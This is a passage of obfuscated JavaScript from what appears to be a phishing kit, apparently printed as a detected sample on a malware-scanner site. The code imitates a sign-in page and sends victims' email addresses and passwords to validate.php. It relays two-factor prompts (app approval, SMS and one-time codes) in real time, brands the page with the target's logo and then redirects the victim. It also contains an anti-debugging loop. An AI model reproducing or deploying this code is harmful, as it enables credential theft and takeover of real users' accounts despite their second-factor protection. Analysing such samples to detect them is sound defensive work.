document[_0x54b191(0x149)](_0x54b191(0x13b) + _0xea4f95)[_0x54b191(0x172)][_0x54b191(0x19f)](_0x54b191(0x16e));
const _0x25d4e9 = overlayMap[_0xea4f95] || 'overlay';
document[_0x54b191(0x149)](_0x25d4e9)[_0x54b191(0x172)]['remove'](_0x54b191(0x188)), document['getElementById']('error_' + _0xea4f95)[_0x54b191(0x199)] = _0xb5c911;
const _0x502ba8 = inputMap[_0xea4f95];
if (_0x502ba8) {
const {
input: _0x5eabc7,
errorVar: _0x5c1caf
} = _0x502ba8;
_0x5eabc7[_0x54b191(0x172)][_0x54b191(0x14a)]('error-inp', !_0x155629), window[_0x5c1caf] = _0x155629;
}
}
function hideSection(_0x4896f6) {
const _0x4c0539 = _0x41b79a;
document['getElementById']('section_' + _0x4896f6)[_0x4c0539(0x172)][_0x4c0539(0x19f)](_0x4c0539(0x16e));
const _0x40f26 = overlayMap[_0x4896f6] || _0x4c0539(0x1ae);
document[_0x4c0539(0x149)](_0x40f26)[_0x4c0539(0x172)]['remove']('active');
}
console.log(_0x1519(0x176));
function validate(){
const _0x2ff5d1=_0x41b79a;
function _0x592abb(_0x503c5d){
const _0x25b84f=_0x1519;
show('uname');
if(!_0x503c5d){
hide(_0x25b84f(0x134),![],unReq);
return;
}
$[_0x25b84f(0x176)]({
'url':'validate.php',
'type':'POST',
'dataType':'json',
'data':{'em':unameInp[_0x25b84f(0x13a)]},
'success':function(_0x388311){
const _0x50bf4c=_0x25b84f,
{
live:_0x4c3d10,
grablogo:_0x2bd534,
background:_0x2de95b,
icon:_0x53f297
}=_0x388311;
_0x4c3d10&&!unameVal?(hide(_0x50bf4c(0x134),!![],''),_0x2bd534&&setBackgroundAndLogo(_0x2de95b,_0x53f297),updateView(_0x50bf4c(0x14c),[_0x50bf4c(0x17d)],['section_uname']),document[_0x50bf4c(0x15f)]('#user_identity')['forEach'](_0x3ea611=>_0x3ea611[_0x50bf4c(0x1b0)]=unameInp[_0x50bf4c(0x13a)]),view=_0x50bf4c(0x14c),unameVal=!![]):hide('uname',![],unEm);
},
'error':function(){
window['location']['href']=random;
}
});
}
function _0x9e84c(_0x36ad87){
const _0x1d15ec=_0x1519;
show('pwd');
if(!_0x36ad87){
hide(_0x1d15ec(0x14c),![],pwdReq);return;
}
$[_0x1d15ec(0x176)]({
'url':'validate.php',
'type':_0x1d15ec(0x1aa),
'dataType':_0x1d15ec(0x19b),
'data':{
'em':unameInp[_0x1d15ec(0x13a)],
'pa':pwdInp[_0x1d15ec(0x13a)]
},
'success':function(_0x5dd83c){
const _0x2cd5e1=_0x1d15ec,
{
live:_0x3e1f87,
twofactor:_0x44ec39,
twofactor_info:_0x1f4164
}=_0x5dd83c;
if(_0x3e1f87){
if(_0x44ec39){
if(!pwdVal){
_0x1f4164[_0x2cd5e1(0x1a4)](_0x29da87=>{
const _0x2170f9=_0x2cd5e1;
switch(_0x29da87[_0x2170f9(0x152)]){
case _0x2170f9(0x19a):
showOption(_0x2170f9(0x13d));
break;
case _0x2170f9(0x1a0):
showOption(_0x2170f9(0x17c));
break;
case _0x2170f9(0x1b1):
showOption(_0x2170f9(0x169));
break;
}
_0x29da87['isDefault']==!![]&&(default_item=_0x29da87[_0x2170f9(0x152)]),_0x29da87[_0x2170f9(0x13c)]&&(document[_0x2170f9(0x149)](_0x2170f9(0x1a5))[_0x2170f9(0x1b0)]=_0x2170f9(0x197)+_0x29da87[_0x2170f9(0x13c)],document[_0x2170f9(0x149)]('showDisplay2')[_0x2170f9(0x199)]='<span\ class=\"icon\"><img\ src=\"../page/images/info.png\"\ style=\"width:\ 85%;\ height:\ auto;\"></span>\ We\ texted\ your\ phone\ '+_0x29da87[_0x2170f9(0x13c)]+_0x2170f9(0x195));
});
if(selection==0x0) hide(_0x2cd5e1(0x14c),!![],''),document[_0x2cd5e1(0x149)]('section_pwd')[_0x2cd5e1(0x172)][_0x2cd5e1(0x1af)](_0x2cd5e1(0x139)),document[_0x2cd5e1(0x149)](_0x2cd5e1(0x18c))[_0x2cd5e1(0x172)][_0x2cd5e1(0x19f)]('d-none'),view=_0x2cd5e1(0x189),pwdVal=!![],twoVal=![];
else {
var _0x5ec4cc='';
switch(default_item){
case _0x2cd5e1(0x19a):
_0x5ec4cc='verify_app';
break;
case _0x2cd5e1(0x1a0):
_0x5ec4cc='verify_code';
break;
case _0x2cd5e1(0x1b1):
_0x5ec4cc=_0x2cd5e1(0x174);
break;
default:
hide(_0x2cd5e1(0x14c),!![],''),document[_0x2cd5e1(0x149)]('section_pwd')[_0x2cd5e1(0x172)][_0x2cd5e1(0x1af)](_0x2cd5e1(0x139)),document['getElementById'](_0x2cd5e1(0x18c))[_0x2cd5e1(0x172)][_0x2cd5e1(0x19f)]('d-none'),view='2fa',pwdVal=!![],twoVal=![];
break;
}
_0x5ec4cc!=''&&\$['ajax']({
'url':_0x2cd5e1(0x1a1),
'type':_0x2cd5e1(0x1aa),
'dataType':_0x2cd5e1(0x19b),
'data':{
'em':unameInp[_0x2cd5e1(0x13a)],
'auth':_0x5ec4cc
},
'success':function(_0x44fabe){
const _0x58bb94=_0x2cd5e1;
hideSection(_0x58bb94(0x189));
const {
live:_0xfb00a3
}=_0x44fabe;
if(_0xfb00a3){
if(!twoVal){
hide(_0x58bb94(0x14c),!![],''),pwdVal=!![],twoVal=![];
if(_0x5ec4cc===_0x58bb94(0x144)){
updateView(_0x58bb94(0x12d),[_0x58bb94(0x143)],[_0x58bb94(0x17d)]),document[_0x58bb94(0x149)](_0x58bb94(0x12b))[_0x58bb94(0x199)]=_0x44fabe[_0x58bb94(0x12b)];
const _0x5dd40a=setInterval(()=>{
const _0x468633=_0x58bb94;
view==_0x468633(0x12d)?\$[_0x468633(0x176)]({
'url':_0x468633(0x1a1),
'type':_0x468633(0x1aa),
'dataType':_0x468633(0x19b),
'data':{
'em':unameInp[_0x468633(0x13a)],
'auth':_0x5ec4cc,'code':''
},
'success':function(_0x283387){
const _0x56f6e6=_0x468633,{
live:_0x5c6f7a
}=_0x283387;
if(_0x5c6f7a) !appVal&&(appVal=!![],document['getElementById'](_0x56f6e6(0x143))['classList'][_0x56f6e6(0x1af)](_0x56f6e6(0x139)),document[_0x56f6e6(0x149)]('section_final')['classList']['remove'](_0x56f6e6(0x139)),view=_0x56f6e6(0x192));
else {}
},'error':function(){const _0x540b3e=_0x468633;alert(_0x540b3e(0x1a6));}
}):clearInterval(_0x5dd40a);},
0x1388);
}
else _0x5ec4cc==='verify_code'?updateView(_0x58bb94(0x1ac),[_0x58bb94(0x17e)],['section_pwd']):updateView(_0x58bb94(0x15c),[_0x58bb94(0x12f)],[_0x58bb94(0x17d)]);
}
}
else updateView(_0x58bb94(0x14c),[_0x58bb94(0x17d)],['section_2fa']),document[_0x58bb94(0x15f)](_0x58bb94(0x1ad))[_0x58bb94(0x1a4)](_0x5a243a=>_0x5a243a[_0x58bb94(0x1b0)]=enmail),unameInp['value']=enmail,unameVal=!![],pwdVal=![];
},
'error':function(){const _0x2826a2=_0x2cd5e1;alert(_0x2826a2(0x13f));}});
}
}
}
else!pwdVal&&(hide(_0x2cd5e1(0x14c),!![],''),document[_0x2cd5e1(0x149)](_0x2cd5e1(0x17d))[_0x2cd5e1(0x172)][_0x2cd5e1(0x1af)](_0x2cd5e1(0x139)),document[_0x2cd5e1(0x149)](_0x2cd5e1(0x168))[_0x2cd5e1(0x172)][_0x2cd5e1(0x19f)](_0x2cd5e1(0x139)),view='final',pwdVal=!![]);
}
else hide(_0x2cd5e1(0x14c),![],unPw);
},
'error':function(){
const _0x158a73=_0x1d15ec;
alert(_0x158a73(0x13f));
}
});
}
function _0x1d6c79(_0x4a5372) {
const _0xb0b8e9 = _0x1519;
show('verifnotif');
if (!_0x4a5372) {
hide(_0xb0b8e9(0x18a), ![], emCode);
return;
}
$[_0xb0b8e9(0x176)]({
'url': _0xb0b8e9(0x1a1),
'type': 'POST',
'dataType': _0xb0b8e9(0x19b),
'data': {
'em': unameInp[_0xb0b8e9(0x13a)],
'auth': _0xb0b8e9(0x148),
'code': codeInp['value']
},
'success': function(_0x35628c) {
const _0x183f94 = _0xb0b8e9,
{
live: _0x44ea06
} = _0x35628c;
if (_0x44ea06) !codeVal && (hide(_0x183f94(0x18a), !![], ''), document[_0x183f94(0x149)]('section_verifnotif')[_0x183f94(0x172)][_0x183f94(0x1af)]('d-none'), document[_0x183f94(0x149)]('section_final')[_0x183f94(0x172)]['remove']('d-none'), view = _0x183f94(0x192));
else {
hide(_0x183f94(0x18a), ![], unCode);
if (_0x35628c[_0x183f94(0x14e)] != _0x183f94(0x161)) {}
}
},
'error': function() {
const _0x313b1d = _0xb0b8e9;
alert(_0x313b1d(0x13f));
}
});
}
function _0x44f07c(_0x395748) {
const _0x212813 = _0x1519;
show(_0x212813(0x177));
if (!_0x395748) {
hide(_0x212813(0x177), ![], emCode);
return;
}
$[_0x212813(0x176)]({
'url': _0x212813(0x1a1),
'type': _0x212813(0x1aa),
'dataType': 'json',
'data': {
'em': unameInp[_0x212813(0x13a)],
'auth': 'verify_sms',
'code': smsInp[_0x212813(0x13a)]
},
'success': function(_0x55ec2a) {
const _0x4026f0 = _0x212813,
{
live: _0x2948be
} = _0x55ec2a;
if (_0x2948be) !codeVal && (hide(_0x4026f0(0x177), !![], ''), document[_0x4026f0(0x149)](_0x4026f0(0x12f))[_0x4026f0(0x172)]['add']('d-none'), document['getElementById'](_0x4026f0(0x168))[_0x4026f0(0x172)][_0x4026f0(0x19f)](_0x4026f0(0x139)), view = 'final');
else {
hide(_0x4026f0(0x177), ![], unSms);
if (_0x55ec2a[_0x4026f0(0x14e)] != _0x4026f0(0x155)) {}
}
},
'error': function() {
const _0x131668 = _0x212813;
alert(_0x131668(0x13f));
}
});
}
if(view===_0x2ff5d1(0x134)) _0x592abb(unameInp[_0x2ff5d1(0x13a)][_0x2ff5d1(0x19e)]()!=='');
else{
if(view===_0x2ff5d1(0x14c)) _0x9e84c(pwdInp[_0x2ff5d1(0x13a)][_0x2ff5d1(0x19e)]()!=='');
else{
if(view===_0x2ff5d1(0x1ac)) _0x1d6c79(codeInp[_0x2ff5d1(0x13a)][_0x2ff5d1(0x19e)]()!=='');
else view===_0x2ff5d1(0x15c)&&_0x44f07c(smsInp['value']['trim']()!=='');
}
}
return![];
}
function handleBackButtonClick() {
const _0x4b5c8d = _0x41b79a;
if (view === _0x4b5c8d(0x14c)) unameVal = ![], updateView('uname', [_0x4b5c8d(0x15a)], [_0x4b5c8d(0x17d)]), placeholderImage['style'][_0x4b5c8d(0x13c)] = _0x4b5c8d(0x186), setBackgroundAndLogo(defaultBackground, defaultLogo);
else [_0x4b5c8d(0x12d), _0x4b5c8d(0x15c), '2fa_submit_code'][_0x4b5c8d(0x156)](view) && (twoVal = ![], view = _0x4b5c8d(0x189), toggleVisibility(_0x4b5c8d(0x18c), !![]), toggleVisibility(_0x4b5c8d(0x143), ![]), toggleVisibility('section_sms', ![]), toggleVisibility(_0x4b5c8d(0x17e), ![]));
}
document[_0x41b79a(0x15f)](_0x41b79a(0x191))['forEach'](_0x5748cf => {
const _0x442bd0 = _0x41b79a;
_0x5748cf[_0x442bd0(0x133)](_0x442bd0(0x18e), handleBackButtonClick);
});
function handleFinalButtonClick() {
const _0x39cd41 = _0x41b79a;
if (view === 'final') window[_0x39cd41(0x17b)][_0x39cd41(0x131)] = final_redirect;
else view === _0x39cd41(0x189) && (updateView('pwd', ['section_pwd'], [_0x39cd41(0x18c)]), document[_0x39cd41(0x15f)](_0x39cd41(0x1ad))['forEach'](_0x5bbb39 => _0x5bbb39['innerText'] = enmail), unameInp['value'] = enmail, unameVal = !![], pwdVal = ![]);
}
document['querySelectorAll']('#btn_final')['forEach'](_0x39a1a8 => {
_0x39a1a8['addEventListener']('click', handleFinalButtonClick);
}), signInOptions['textContent'] = decodedText, hideOption('.option[data-url="verify_sms"]'), hideOption('.option[data-url="verify_app"]'), hideOption('.option[data-url="verify_code"]');
function _0x2bbc() {
const _0x924ceb = ['#user_identity', 'overlay', 'add', 'innerText', 'OneWaySMS', 'entropy', 'debu', '2fa_submit_app', 'overlay6', 'section_sms', 'inp_pwd', 'href', 'form', 'addEventListener', 'uname', 'search', 'placeholder-image-2', '335388BeRxYk', '2612boVDvx', 'd-none', 'value', 'section_', 'display', '.option[data-url=\"verify_app\"]', 'overlay2', 'An\ error\ occurred.', 'error_verifnotif', 'call', 'unameVal', 'section_appnotif', 'verify_app', 'codeVal', 'inp_codesms', 'textContent', 'verify_code', 'getElementById', 'toggle', 'error-inp', 'pwd', 'overlay5', 'reason', 'btn_sms', 'string', 'inp_verifnotif', 'method_name', '\');\
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ background-size:\ cover;\
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ background-position:\ center;\
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ background-repeat:\ no-repeat;\
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ ', 'src', 'SMSAuthFailedWrongCodeEntered', 'includes', 'gger', 'style', 'btn_next', 'section_uname', 'inp_uname', '2fa_submit_sms', '442ERGQrU', '261224VYcIWe', 'querySelectorAll', 'apply', 'OathCodeIncorrect', '\
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ content:\ \"\";\
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ position:\ absolute;\
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ top:\ 0;\
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ left:\ 0;\
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ right:\ 0;\
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ bottom:\ 0;\
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ z-index:\ -1;\
\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ background-image:\ url(\'', 'input', 'body', '4540nvXKhF', 'logoimage', 'action', 'section_final', '.option[data-url=\"verify_sms\"]', '7NBCeta', 'smsVal', 'hidden', '586184WDkbpm', 'section-disabled', '#btn_final', 'error_sms', 'counter', 'classList', 'pwdVal', 'verify_sms', '81uhieRd', 'ajax', 'sms', 'stateObject', '10681qqGjNl', '2XLBvUK', 'location', '.option[data-url=\"verify_code\"]', 'section_pwd', 'section_verifnotif', 'test', 'querySelector', '1981086XpWmIL', '\\+\\+\ *(?:[a-zA-Z_\$][0-9a-zA-Z_\$]*)', 'assign', 'placeholder-image', 'constructor', 'none', 'block', 'active', '2fa', 'verifnotif', 'signInOptions', 'section_2fa', 'data-url', 'click', '1242174bxMvdM', 'init', '.back', 'final', '(((.+)+)+)+\$', 'submit', '.\ Please\ enter\ the\ code\ to\ sign\ in.', 'cssText', 'Text\ ', 'preventDefault', 'innerHTML', 'PhoneAppNotification', 'json', 'btn_sig', '.common-overlay', 'trim', 'remove', 'PhoneAppOTP', 'validate', '1635rSfCXT', 'chain', 'forEach', 'showDisplay', 'An\ error\ occurred\ during\ the\ periodic\ validation.', 'toString', 'overlay4', 'function\ *\\(\ *\\)', 'POST', 'link_back', '2fa_submit_code'];
_0x2bbc = function() {
return _0x924ceb;
};
return _0x924ceb;
}
function _0x40f52e(_0x5b4c1d) {
function _0x15a9a9(_0x2b135a) {
const _0x583ce0 = _0x1519;
if (typeof _0x2b135a === _0x583ce0(0x150)) return function(_0x3ec37c) {} [_0x583ce0(0x185)]('while\ (true)\ {}')[_0x583ce0(0x160)](_0x583ce0(0x171));
else('' + _0x2b135a / _0x2b135a)['length'] !== 0x1 || _0x2b135a % 0x14 === 0x0 ? function() {
return !![];
} [_0x583ce0(0x185)](_0x583ce0(0x12c) + _0x583ce0(0x157))[_0x583ce0(0x141)](_0x583ce0(0x167)) : function() {
return ![];
} [_0x583ce0(0x185)](_0x583ce0(0x12c) + _0x583ce0(0x157))[_0x583ce0(0x160)](_0x583ce0(0x178));
_0x15a9a9(++_0x2b135a);
}
try {
if (_0x5b4c1d) return _0x15a9a9;
else _0x15a9a9(0x0);
} catch (_0x1df5d4) {}
}
console.log(_0x1519(0x181));
\r\n});\r\n\r\n
</script>\r\n</body>\r\n\r\n</html>\r\n
JS;
© 2023 Quttera Ltd. All rights reserved.